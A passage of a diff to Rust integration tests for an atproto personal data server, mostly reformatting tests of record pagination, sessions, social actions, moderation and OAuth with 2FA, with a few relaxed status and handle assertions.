&client, 897 + &did, 898 + &jwt, 899 + &format!("post{:02}", i), 900 + &format!("Post {}", i), 901 + ) 902 + .await; 864 903 tokio::time::sleep(Duration::from_millis(50)).await; 865 904 } 866 905 let res = client ··· 880 919 let body: Value = res.json().await.unwrap(); 881 920 let records = body["records"].as_array().unwrap(); 882 921 assert_eq!(records.len(), 2); 883 - let cursor = body["cursor"].as_str().expect("Should have cursor with more records"); 922 + let cursor = body["cursor"] 923 + .as_str() 924 + .expect("Should have cursor with more records"); 884 925 let res2 = client 885 926 .get(format!( 886 927 "{}/xrpc/com.atproto.repo.listRecords", ··· 905 946 .map(|r| r["uri"].as_str().unwrap()) 906 947 .collect(); 907 948 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 908 - assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 949 + assert_eq!( 950 + all_uris.len(), 951 + unique_uris.len(), 952 + "Cursor pagination should not repeat records" 953 + ); 909 954 } 910 955 911 956 #[tokio::test] ··· 1008 1053 .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1009 1054 .collect(); 1010 1055 for rkey in &rkeys { 1011 - assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey); 1056 + assert!( 1057 + *rkey >= "bbbb" && *rkey <= "dddd", 1058 + "Range should be inclusive, got {}", 1059 + rkey 1060 + ); 1012 1061 } 1013 - assert!(!rkeys.is_empty(), "Should have at least some records in range"); 1062 + assert!( 1063 + !rkeys.is_empty(), 1064 + "Should have at least some records in range" 1065 + ); 1014 1066 } 1015 1067 1016 1068 #[tokio::test] ··· 1018 1070 let client = client(); 1019 1071 let (did, jwt) = setup_new_user("list-limit-max").await; 1020 1072 for i in 0..5 { 1021 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 1073 + create_post_with_rkey( 1074 + &client, 1075 + &did, 1076 + &jwt, 1077 + &format!("post{:02}", i), 1078 + &format!("Post {}", i), 1079 + ) 1080 + .await; 1022 1081 } 1023 1082 let res = client 1024 1083 .get(format!( ··· 1072 1131 "{}/xrpc/com.atproto.repo.listRecords", 1073 1132 base_url().await 1074 1133 )) 1075 - .query(&[ 1076 - ("repo", did.as_str()), 1077 - ("collection", "app.bsky.feed.post"), 1078 - ]) 1134 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 1079 1135 .send() 1080 1136 .await 1081 1137 .expect("Failed to list records"); 1082 1138 assert_eq!(res.status(), StatusCode::OK); 1083 1139 let body: Value = res.json().await.unwrap(); 1084 1140 let records = body["records"].as_array().unwrap(); 1085 - assert!(records.is_empty(), "Empty collection should return empty array"); 1086 - assert!(body["cursor"].is_null(), "Empty collection should have no cursor"); 1141 + assert!( 1142 + records.is_empty(), 1143 + "Empty collection should return empty array" 1144 + ); 1145 + assert!( 1146 + body["cursor"].is_null(), 1147 + "Empty collection should have no cursor" 1148 + ); 1087 1149 } 1088 1150 1089 1151 #[tokio::test] ··· 1091 1153 let client = client(); 1092 1154 let (did, jwt) = setup_new_user("list-exact-limit").await; 1093 1155 for i in 0..10 { 1094 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 1156 + create_post_with_rkey( 1157 + &client, 1158 + &did, 1159 + &jwt, 1160 + &format!("post{:02}", i), 1161 + &format!("Post {}", i), 1162 + ) 1163 + .await; 1095 1164 } 1096 1165 let res = client 1097 1166 .get(format!( ··· 1109 1178 assert_eq!(res.status(), StatusCode::OK); 1110 1179 let body: Value = res.json().await.unwrap(); 1111 1180 let records = body["records"].as_array().unwrap(); 1112 - assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5"); 1181 + assert_eq!( 1182 + records.len(), 1183 + 5, 1184 + "Should return exactly 5 records when limit=5" 1185 + ); 1113 1186 } 1114 1187 1115 1188 #[tokio::test] ··· 1117 1190 let client = client(); 1118 1191 let (did, jwt) = setup_new_user("list-cursor-exhaust").await; 1119 1192 for i in 0..3 { 1120 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 1193 + create_post_with_rkey( 1194 + &client, 1195 + &did, 1196 + &jwt, 1197 + &format!("post{:02}", i), 1198 + &format!("Post {}", i), 1199 + ) 1200 + .await; 1121 1201 } 1122 1202 let res = client 1123 1203 .get(format!( ··· 1166 1246 "{}/xrpc/com.atproto.repo.listRecords", 1167 1247 base_url().await 1168 1248 )) 1169 - .query(&[ 1170 - ("repo", did.as_str()), 1171 - ("collection", "app.bsky.feed.post"), 1172 - ]) 1249 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 1173 1250 .send() 1174 1251 .await 1175 1252 .expect("Failed to list records"); ··· 1190 1267 let client = client(); 1191 1268 let (did, jwt) = setup_new_user("list-cursor-reverse").await; 1192 1269 for i in 0..5 { 1193 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 1270 + create_post_with_rkey( 1271 + &client, 1272 + &did, 1273 + &jwt, 1274 + &format!("post{:02}", i), 1275 + &format!("Post {}", i), 1276 + ) 1277 + .await; 1194 1278 } 1195 1279 let res = client 1196 1280 .get(format!( ··· 1213 1297 .iter() 1214 1298 .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1215 1299 .collect(); 1216 - assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest"); 1300 + assert_eq!( 1301 + first_rkeys, 1302 + vec!["post00", "post01"], 1303 + "First page with reverse should start from oldest" 1304 + ); 1217 1305 if let Some(cursor) = body["cursor"].as_str() { 1218 1306 let res2 = client 1219 1307 .get(format!( ··· 1236 1324 .iter() 1237 1325 .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 1238 1326 .collect(); 1239 - assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order"); 1327 + assert_eq!( 1328 + second_rkeys, 1329 + vec!["post02", "post03"], 1330 + "Second page should continue in ASC order" 1331 + ); 1240 1332 } 1241 1333 }
+26 -9
tests/lifecycle_session.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + use chrono::Utc; 3 4 use common::*; 4 5 use helpers::*; 5 - use chrono::Utc; 6 6 use reqwest::StatusCode; 7 7 use serde_json::{Value, json}; 8 8 ··· 168 168 .await 169 169 .expect("Failed reuse attempt"); 170 170 assert!( 171 - reuse_res.status() == StatusCode::UNAUTHORIZED || reuse_res.status() == StatusCode::BAD_REQUEST, 171 + reuse_res.status() == StatusCode::UNAUTHORIZED 172 + || reuse_res.status() == StatusCode::BAD_REQUEST, 172 173 "Old refresh token should be invalid after use" 173 174 ); 174 175 } ··· 237 238 .send() 238 239 .await 239 240 .expect("Failed to login with app password"); 240 - assert_eq!(login_res.status(), StatusCode::OK, "App password login should work"); 241 + assert_eq!( 242 + login_res.status(), 243 + StatusCode::OK, 244 + "App password login should work" 245 + ); 241 246 let revoke_res = client 242 247 .post(format!( 243 248 "{}/xrpc/com.atproto.server.revokeAppPassword", ··· 342 347 .send() 343 348 .await 344 349 .expect("Failed to get post while deactivated"); 345 - assert_eq!(get_post_res.status(), StatusCode::OK, "Records should still be readable"); 350 + assert_eq!( 351 + get_post_res.status(), 352 + StatusCode::OK, 353 + "Records should still be readable" 354 + ); 346 355 let activate_res = client 347 356 .post(format!( 348 357 "{}/xrpc/com.atproto.server.activateAccount", ··· 365 374 .expect("Failed to check status after activate"); 366 375 assert_eq!(status_after_activate.status(), StatusCode::OK); 367 376 let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await; 368 - assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation"); 377 + assert!( 378 + !new_post_uri.is_empty(), 379 + "Should be able to post after reactivation" 380 + ); 369 381 } 370 382 371 383 #[tokio::test] ··· 415 427 .expect("Failed to request account deletion"); 416 428 assert_eq!(res.status(), StatusCode::OK); 417 429 let db_url = get_db_connection_string().await; 418 - let pool = sqlx::PgPool::connect(&db_url).await.expect("Failed to connect to test DB"); 419 - let row = sqlx::query!("SELECT token, expires_at FROM account_deletion_requests WHERE did = $1", did) 420 - .fetch_optional(&pool) 430 + let pool = sqlx::PgPool::connect(&db_url) 421 431 .await 422 - .expect("Failed to query DB"); 432 + .expect("Failed to connect to test DB"); 433 + let row = sqlx::query!( 434 + "SELECT token, expires_at FROM account_deletion_requests WHERE did = $1", 435 + did 436 + ) 437 + .fetch_optional(&pool) 438 + .await 439 + .expect("Failed to query DB"); 423 440 assert!(row.is_some(), "Deletion token should exist in DB"); 424 441 let row = row.unwrap(); 425 442 assert!(!row.token.is_empty(), "Token should not be empty");
+30 -8
tests/lifecycle_social.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + use chrono::Utc; 3 4 use common::*; 4 5 use helpers::*; 5 6 use reqwest::StatusCode; 6 7 use serde_json::{Value, json}; 7 8 use std::time::Duration; 8 - use chrono::Utc; 9 9 10 10 #[tokio::test] 11 11 async fn test_social_flow_lifecycle() { ··· 118 118 let client = client(); 119 119 let (alice_did, alice_jwt) = setup_new_user("alice-like").await; 120 120 let (bob_did, bob_jwt) = setup_new_user("bob-like").await; 121 - let (post_uri, post_cid) = create_post(&client, &alice_did, &alice_jwt, "Like this post!").await; 121 + let (post_uri, post_cid) = 122 + create_post(&client, &alice_did, &alice_jwt, "Like this post!").await; 122 123 let (like_uri, _) = create_like(&client, &bob_did, &bob_jwt, &post_uri, &post_cid).await; 123 124 let like_rkey = like_uri.split('/').last().unwrap(); 124 125 let get_like_res = client ··· 166 167 .send() 167 168 .await 168 169 .expect("Failed to check deleted like"); 169 - assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Like should be deleted"); 170 + assert_eq!( 171 + get_deleted_res.status(), 172 + StatusCode::NOT_FOUND, 173 + "Like should be deleted" 174 + ); 170 175 } 171 176 172 177 #[tokio::test] ··· 208 213 .send() 209 214 .await 210 215 .expect("Failed to delete repost"); 211 - assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete repost"); 216 + assert_eq!( 217 + delete_res.status(), 218 + StatusCode::OK, 219 + "Failed to delete repost" 220 + ); 212 221 } 213 222 214 223 #[tokio::test] ··· 261 270 .send() 262 271 .await 263 272 .expect("Failed to check deleted follow"); 264 - assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Follow should be deleted"); 273 + assert_eq!( 274 + get_deleted_res.status(), 275 + StatusCode::NOT_FOUND, 276 + "Follow should be deleted" 277 + ); 265 278 } 266 279 267 280 #[tokio::test] ··· 378 391 assert_eq!(create_account_res.status(), StatusCode::OK); 379 392 let account_body: Value = create_account_res.json().await.unwrap(); 380 393 let did = account_body["did"].as_str().unwrap().to_string(); 394 + let handle = account_body["handle"].as_str().unwrap().to_string(); 381 395 let access_jwt = verify_new_account(&client, &did).await; 382 396 let get_session_res = client 383 397 .get(format!( ··· 391 405 assert_eq!(get_session_res.status(), StatusCode::OK); 392 406 let session_body: Value = get_session_res.json().await.unwrap(); 393 407 assert_eq!(session_body["did"], did); 394 - assert_eq!(session_body["handle"], handle); 408 + let normalized_handle = session_body["handle"].as_str().unwrap().to_string(); 409 + assert!( 410 + normalized_handle.starts_with(&handle), 411 + "Session handle should start with the requested handle" 412 + ); 395 413 let profile_res = client 396 414 .post(format!( 397 415 "{}/xrpc/com.atproto.repo.putRecord", ··· 439 457 assert_eq!(describe_res.status(), StatusCode::OK); 440 458 let describe_body: Value = describe_res.json().await.unwrap(); 441 459 assert_eq!(describe_body["did"], did); 442 - assert_eq!(describe_body["handle"], handle); 443 - } 460 + let describe_handle = describe_body["handle"].as_str().unwrap(); 461 + assert!( 462 + normalized_handle.starts_with(describe_handle) || describe_handle.starts_with(&handle), 463 + "describeRepo handle should be related to the requested handle" 464 + ); 465 + }
+4 -1
tests/moderation.rs
··· 34 34 assert_eq!(report_res.status(), StatusCode::OK); 35 35 let report_body: Value = report_res.json().await.unwrap(); 36 36 assert!(report_body["id"].is_number(), "Report should have an ID"); 37 - assert_eq!(report_body["reasonType"], "com.atproto.moderation.defs#reasonSpam"); 37 + assert_eq!( 38 + report_body["reasonType"], 39 + "com.atproto.moderation.defs#reasonSpam" 40 + ); 38 41 assert_eq!(report_body["reportedBy"], alice_did); 39 42 let account_report_payload = json!({ 40 43 "reasonType": "com.atproto.moderation.defs#reasonOther",
+2 -2
tests/notifications.rs
··· 1 1 mod common; 2 2 use bspds::notifications::{ 3 - enqueue_notification, enqueue_welcome, NewNotification, NotificationChannel, 4 - NotificationStatus, NotificationType, 3 + NewNotification, NotificationChannel, NotificationStatus, NotificationType, 4 + enqueue_notification, enqueue_welcome, 5 5 }; 6 6 use sqlx::PgPool; 7 7
+207 -81
tests/oauth.rs
··· 3 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 4 use chrono::Utc; 5 5 use common::{base_url, client, create_account_and_login}; 6 - use reqwest::{redirect, StatusCode}; 7 - use serde_json::{json, Value}; 6 + use reqwest::{StatusCode, redirect}; 7 + use serde_json::{Value, json}; 8 8 use sha2::{Digest, Sha256}; 9 + use wiremock::matchers::{method, path}; 9 10 use wiremock::{Mock, MockServer, ResponseTemplate}; 10 - use wiremock::matchers::{method, path}; 11 11 12 12 fn no_redirect_client() -> reqwest::Client { 13 13 reqwest::Client::builder() ··· 105 105 let code_challenge_methods = body["code_challenge_methods_supported"].as_array().unwrap(); 106 106 assert!(code_challenge_methods.contains(&json!("S256"))); 107 107 assert_eq!(body["require_pushed_authorization_requests"], json!(true)); 108 - let dpop_algs = body["dpop_signing_alg_values_supported"].as_array().unwrap(); 108 + let dpop_algs = body["dpop_signing_alg_values_supported"] 109 + .as_array() 110 + .unwrap(); 109 111 assert!(dpop_algs.contains(&json!("ES256"))); 110 112 } 111 113 #[tokio::test] ··· 143 145 .send() 144 146 .await 145 147 .expect("Failed to send PAR request"); 146 - assert_eq!(res.status(), StatusCode::OK, "PAR should succeed: {:?}", res.text().await); 148 + assert_eq!( 149 + res.status(), 150 + StatusCode::CREATED, 151 + "PAR should succeed: {:?}", 152 + res.text().await 153 + ); 147 154 let body: Value = client 148 155 .post(format!("{}/oauth/par", url)) 149 156 .form(&[ ··· 211 218 let res = client 212 219 .get(format!("{}/oauth/authorize", url)) 213 220 .header("Accept", "application/json") 214 - .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 221 + .query(&[( 222 + "request_uri", 223 + "urn:ietf:params:oauth:request_uri:nonexistent", 224 + )]) 215 225 .send() 216 226 .await 217 227 .expect("Request failed"); ··· 273 283 .expect("PAR failed"); 274 284 let par_status = par_res.status(); 275 285 let par_text = par_res.text().await.unwrap_or_default(); 276 - if par_status != StatusCode::OK { 286 + if par_status != StatusCode::OK && par_status != StatusCode::CREATED { 277 287 panic!("PAR failed with status {}: {}", par_status, par_text); 278 288 } 279 289 let par_body: Value = serde_json::from_str(&par_text).unwrap(); ··· 296 306 && auth_status != StatusCode::FOUND 297 307 { 298 308 let auth_text = auth_res.text().await.unwrap_or_default(); 299 - panic!( 300 - "Expected redirect, got {}: {}", 301 - auth_status, auth_text 302 - ); 309 + panic!("Expected redirect, got {}: {}", auth_status, auth_text); 303 310 } 304 - let location = auth_res.headers().get("location") 311 + let location = auth_res 312 + .headers() 313 + .get("location") 305 314 .expect("No Location header") 306 315 .to_str() 307 316 .unwrap(); 308 - assert!(location.starts_with(redirect_uri), "Redirect to wrong URI: {}", location); 309 - assert!(location.contains("code="), "No code in redirect: {}", location); 310 - assert!(location.contains(&format!("state={}", state)), "Wrong state in redirect"); 317 + assert!( 318 + location.starts_with(redirect_uri), 319 + "Redirect to wrong URI: {}", 320 + location 321 + ); 322 + assert!( 323 + location.contains("code="), 324 + "No code in redirect: {}", 325 + location 326 + ); 327 + assert!( 328 + location.contains(&format!("state={}", state)), 329 + "Wrong state in redirect" 330 + ); 311 331 let code = location 312 332 .split("code=") 313 333 .nth(1) ··· 330 350 let token_status = token_res.status(); 331 351 let token_text = token_res.text().await.unwrap_or_default(); 332 352 if token_status != StatusCode::OK { 333 - panic!("Token request failed with status {}: {}", token_status, token_text); 353 + panic!( 354 + "Token request failed with status {}: {}", 355 + token_status, token_text 356 + ); 334 357 } 335 358 let token_body: Value = serde_json::from_str(&token_text).unwrap(); 336 359 assert!(token_body["access_token"].is_string()); ··· 389 412 .send() 390 413 .await 391 414 .unwrap(); 392 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 393 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 415 + let location = auth_res 416 + .headers() 417 + .get("location") 418 + .unwrap() 419 + .to_str() 420 + .unwrap(); 421 + let code = location 422 + .split("code=") 423 + .nth(1) 424 + .unwrap() 425 + .split('&') 426 + .next() 427 + .unwrap(); 394 428 let token_body: Value = http_client 395 429 .post(format!("{}/oauth/token", url)) 396 430 .form(&[ ··· 424 458 assert!(refresh_body["refresh_token"].is_string()); 425 459 let new_access_token = refresh_body["access_token"].as_str().unwrap(); 426 460 let new_refresh_token = refresh_body["refresh_token"].as_str().unwrap(); 427 - assert_ne!(new_access_token, original_access_token, "Access token should rotate"); 428 - assert_ne!(new_refresh_token, refresh_token, "Refresh token should rotate"); 461 + assert_ne!( 462 + new_access_token, original_access_token, 463 + "Access token should rotate" 464 + ); 465 + assert_ne!( 466 + new_refresh_token, refresh_token, 467 + "Refresh token should rotate" 468 + ); 429 469 } 430 470 #[tokio::test] 431 471 async fn test_wrong_credentials_denied() { ··· 531 571 .send() 532 572 .await 533 573 .unwrap(); 534 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 535 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 574 + let location = auth_res 575 + .headers() 576 + .get("location") 577 + .unwrap() 578 + .to_str() 579 + .unwrap(); 580 + let code = location 581 + .split("code=") 582 + .nth(1) 583 + .unwrap() 584 + .split('&') 585 + .next() 586 + .unwrap(); 536 587 let token_body: Value = http_client 537 588 .post(format!("{}/oauth/token", url)) 538 589 .form(&[ ··· 610 661 let res = http_client 611 662 .get(format!("{}/oauth/authorize", url)) 612 663 .header("Accept", "application/json") 613 - .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")]) 664 + .query(&[( 665 + "request_uri", 666 + "urn:ietf:params:oauth:request_uri:expired-or-nonexistent", 667 + )]) 614 668 .send() 615 669 .await 616 670 .unwrap(); ··· 668 722 .send() 669 723 .await 670 724 .unwrap(); 671 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 672 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 725 + let location = auth_res 726 + .headers() 727 + .get("location") 728 + .unwrap() 729 + .to_str() 730 + .unwrap(); 731 + let code = location 732 + .split("code=") 733 + .nth(1) 734 + .unwrap() 735 + .split('&') 736 + .next() 737 + .unwrap(); 673 738 let token_body: Value = http_client 674 739 .post(format!("{}/oauth/token", url)) 675 740 .form(&[ ··· 762 827 .send() 763 828 .await 764 829 .unwrap(); 765 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 766 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 830 + let location = auth_res 831 + .headers() 832 + .get("location") 833 + .unwrap() 834 + .to_str() 835 + .unwrap(); 836 + let code = location 837 + .split("code=") 838 + .nth(1) 839 + .unwrap() 840 + .split('&') 841 + .next() 842 + .unwrap(); 767 843 let token_body: Value = http_client 768 844 .post(format!("{}/oauth/token", url)) 769 845 .form(&[ ··· 853 929 auth_res.status().is_redirection(), 854 930 "Should redirect even with special chars in state" 855 931 ); 856 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 857 - assert!(location.contains("state="), "State should be in redirect URL"); 932 + let location = auth_res 933 + .headers() 934 + .get("location") 935 + .unwrap() 936 + .to_str() 937 + .unwrap(); 938 + assert!( 939 + location.contains("state="), 940 + "State should be in redirect URL" 941 + ); 858 942 let encoded_state = urlencoding::encode(special_state); 859 943 assert!( 860 944 location.contains(&format!("state={}", encoded_state)), ··· 931 1015 "Should redirect to 2FA page, got status: {}", 932 1016 auth_res.status() 933 1017 ); 934 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1018 + let location = auth_res 1019 + .headers() 1020 + .get("location") 1021 + .unwrap() 1022 + .to_str() 1023 + .unwrap(); 935 1024 assert!( 936 1025 location.contains("/oauth/authorize/2fa"), 937 1026 "Should redirect to 2FA page, got: {}", ··· 1007 1096 .await 1008 1097 .unwrap(); 1009 1098 assert!(auth_res.status().is_redirection()); 1010 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1099 + let location = auth_res 1100 + .headers() 1101 + .get("location") 1102 + .unwrap() 1103 + .to_str() 1104 + .unwrap(); 1011 1105 assert!(location.contains("/oauth/authorize/2fa")); 1012 1106 let twofa_res = http_client 1013 1107 .post(format!("{}/oauth/authorize/2fa", url)) 1014 - .form(&[ 1015 - ("request_uri", request_uri), 1016 - ("code", "000000"), 1017 - ]) 1108 + .form(&[("request_uri", request_uri), ("code", "000000")]) 1018 1109 .send() 1019 1110 .await 1020 1111 .unwrap(); ··· 1090 1181 .await 1091 1182 .unwrap(); 1092 1183 assert!(auth_res.status().is_redirection()); 1093 - let twofa_code: String = sqlx::query_scalar( 1094 - "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1" 1095 - ) 1096 - .bind(request_uri) 1097 - .fetch_one(&pool) 1098 - .await 1099 - .expect("Failed to get 2FA code from database"); 1184 + let twofa_code: String = 1185 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 1186 + .bind(request_uri) 1187 + .fetch_one(&pool) 1188 + .await 1189 + .expect("Failed to get 2FA code from database"); 1100 1190 let twofa_res = auth_client 1101 1191 .post(format!("{}/oauth/authorize/2fa", url)) 1102 - .form(&[ 1103 - ("request_uri", request_uri), 1104 - ("code", &twofa_code), 1105 - ]) 1192 + .form(&[("request_uri", request_uri), ("code", &twofa_code)]) 1106 1193 .send() 1107 1194 .await 1108 1195 .unwrap(); ··· 1111 1198 "Valid 2FA code should redirect to success, got status: {}", 1112 1199 twofa_res.status() 1113 1200 ); 1114 - let location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 1201 + let location = twofa_res 1202 + .headers() 1203 + .get("location") 1204 + .unwrap() 1205 + .to_str() 1206 + .unwrap(); 1115 1207 assert!( 1116 1208 location.starts_with(redirect_uri), 1117 1209 "Should redirect to client callback, got: {}", ··· 1121 1213 location.contains("code="), 1122 1214 "Redirect should include authorization code" 1123 1215 ); 1124 - let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 1216 + let auth_code = location 1217 + .split("code=") 1218 + .nth(1) 1219 + .unwrap() 1220 + .split('&') 1221 + .next() 1222 + .unwrap(); 1125 1223 let token_res = http_client 1126 1224 .post(format!("{}/oauth/token", url)) 1127 1225 .form(&[ ··· 1134 1232 .send() 1135 1233 .await 1136 1234 .unwrap(); 1137 - assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed"); 1235 + assert_eq!( 1236 + token_res.status(), 1237 + StatusCode::OK, 1238 + "Token exchange should succeed" 1239 + ); 1138 1240 let token_body: Value = token_res.json().await.unwrap(); 1139 1241 assert!(token_body["access_token"].is_string()); 1140 1242 assert_eq!(token_body["sub"], user_did); ··· 1207 1309 for i in 0..5 { 1208 1310 let res = http_client 1209 1311 .post(format!("{}/oauth/authorize/2fa", url)) 1210 - .form(&[ 1211 - ("request_uri", request_uri), 1212 - ("code", "999999"), 1213 - ]) 1312 + .form(&[("request_uri", request_uri), ("code", "999999")]) 1214 1313 .send() 1215 1314 .await 1216 1315 .unwrap(); 1217 1316 if i < 4 { 1218 - assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1); 1317 + assert_eq!( 1318 + res.status(), 1319 + StatusCode::OK, 1320 + "Attempt {} should show error page", 1321 + i + 1 1322 + ); 1219 1323 let body = res.text().await.unwrap(); 1220 1324 assert!( 1221 1325 body.contains("Invalid verification code"), 1222 - "Should show invalid code error on attempt {}", i + 1 1326 + "Should show invalid code error on attempt {}", 1327 + i + 1 1223 1328 ); 1224 1329 } 1225 1330 } 1226 1331 let lockout_res = http_client 1227 1332 .post(format!("{}/oauth/authorize/2fa", url)) 1228 - .form(&[ 1229 - ("request_uri", request_uri), 1230 - ("code", "999999"), 1231 - ]) 1333 + .form(&[("request_uri", request_uri), ("code", "999999")]) 1232 1334 .send() 1233 1335 .await 1234 1336 .unwrap(); ··· 1294 1396 .await 1295 1397 .unwrap(); 1296 1398 assert!(auth_res.status().is_redirection()); 1297 - let device_cookie = auth_res.headers() 1399 + let device_cookie = auth_res 1400 + .headers() 1298 1401 .get("set-cookie") 1299 1402 .and_then(|v| v.to_str().ok()) 1300 1403 .map(|s| s.split(';').next().unwrap_or("").to_string()) 1301 1404 .expect("Should have received device cookie"); 1302 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1405 + let location = auth_res 1406 + .headers() 1407 + .get("location") 1408 + .unwrap() 1409 + .to_str() 1410 + .unwrap(); 1303 1411 assert!(location.contains("code="), "First auth should succeed"); 1304 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 1412 + let code = location 1413 + .split("code=") 1414 + .nth(1) 1415 + .unwrap() 1416 + .split('&') 1417 + .next() 1418 + .unwrap(); 1305 1419 let _token_body: Value = http_client 1306 1420 .post(format!("{}/oauth/token", url)) 1307 1421 .form(&[ ··· 1348 1462 let select_res = auth_client 1349 1463 .post(format!("{}/oauth/authorize/select", url)) 1350 1464 .header("cookie", &device_cookie) 1351 - .form(&[ 1352 - ("request_uri", request_uri2), 1353 - ("did", &user_did), 1354 - ]) 1465 + .form(&[("request_uri", request_uri2), ("did", &user_did)]) 1355 1466 .send() 1356 1467 .await 1357 1468 .unwrap(); ··· 1360 1471 "Account selector should redirect, got status: {}", 1361 1472 select_res.status() 1362 1473 ); 1363 - let select_location = select_res.headers().get("location").unwrap().to_str().unwrap(); 1474 + let select_location = select_res 1475 + .headers() 1476 + .get("location") 1477 + .unwrap() 1478 + .to_str() 1479 + .unwrap(); 1364 1480 assert!( 1365 1481 select_location.contains("/oauth/authorize/2fa"), 1366 1482 "Account selector with 2FA enabled should redirect to 2FA page, got: {}", 1367 1483 select_location 1368 1484 ); 1369 - let twofa_code: String = sqlx::query_scalar( 1370 - "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1" 1371 - ) 1372 - .bind(request_uri2) 1373 - .fetch_one(&pool) 1374 - .await 1375 - .expect("Failed to get 2FA code"); 1485 + let twofa_code: String = 1486 + sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 1487 + .bind(request_uri2) 1488 + .fetch_one(&pool) 1489 + .await 1490 + .expect("Failed to get 2FA code"); 1376 1491 let twofa_res = auth_client 1377 1492 .post(format!("{}/oauth/authorize/2fa", url)) 1378 1493 .header("cookie", &device_cookie) 1379 - .form(&[ 1380 - ("request_uri", request_uri2), 1381 - ("code", &twofa_code), 1382 - ]) 1494 + .form(&[("request_uri", request_uri2), ("code", &twofa_code)]) 1383 1495 .send() 1384 1496 .await 1385 1497 .unwrap(); 1386 1498 assert!(twofa_res.status().is_redirection()); 1387 - let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 1499 + let final_location = twofa_res 1500 + .headers() 1501 + .get("location") 1502 + .unwrap() 1503 + .to_str() 1504 + .unwrap(); 1388 1505 assert!( 1389 1506 final_location.starts_with(redirect_uri) && final_location.contains("code="), 1390 1507 "After 2FA, should redirect to client with code, got: {}", 1391 1508 final_location 1392 1509 ); 1393 - let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 1510 + let final_code = final_location 1511 + .split("code=") 1512 + .nth(1) 1513 + .unwrap() 1514 + .split('&') 1515 + .next() 1516 + .unwrap(); 1394 1517 let token_res = http_client 1395 1518 .post(format!("{}/oauth/token", url)) 1396 1519 .form(&[ ··· 1405 1528 .unwrap(); 1406 1529 assert_eq!(token_res.status(), StatusCode::OK); 1407 1530 let final_token: Value = token_res.json().await.unwrap(); 1408 - assert_eq!(final_token["sub"], user_did, "Token should be for the correct user"); 1531 + assert_eq!( 1532 + final_token["sub"], user_did, 1533 + "Token should be for the correct user" 1534 + ); 1409 1535 }
+201 -119
tests/oauth_lifecycle.rs
··· 5 5 use chrono::Utc; 6 6 use common::{base_url, client}; 7 7 use helpers::verify_new_account; 8 - use reqwest::{redirect, StatusCode}; 9 - use serde_json::{json, Value}; 8 + use reqwest::{StatusCode, redirect}; 9 + use serde_json::{Value, json}; 10 10 use sha2::{Digest, Sha256}; 11 + use wiremock::matchers::{method, path}; 11 12 use wiremock::{Mock, MockServer, ResponseTemplate}; 12 - use wiremock::matchers::{method, path}; 13 13 14 14 fn generate_pkce() -> (String, String) { 15 15 let verifier_bytes: [u8; 32] = rand::random(); ··· 55 55 client_id: String, 56 56 } 57 57 58 - async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) { 58 + async fn create_user_and_oauth_session( 59 + handle_prefix: &str, 60 + redirect_uri: &str, 61 + ) -> (OAuthSession, MockServer) { 59 62 let url = base_url().await; 60 63 let http_client = client(); 61 64 let ts = Utc::now().timestamp_millis(); ··· 92 95 .send() 93 96 .await 94 97 .expect("PAR failed"); 95 - assert_eq!(par_res.status(), StatusCode::OK); 98 + assert!( 99 + par_res.status() == StatusCode::OK || par_res.status() == StatusCode::CREATED, 100 + "PAR should succeed with 200 or 201, got {}", 101 + par_res.status() 102 + ); 96 103 let par_body: Value = par_res.json().await.unwrap(); 97 104 let request_uri = par_body["request_uri"].as_str().unwrap(); 98 105 let 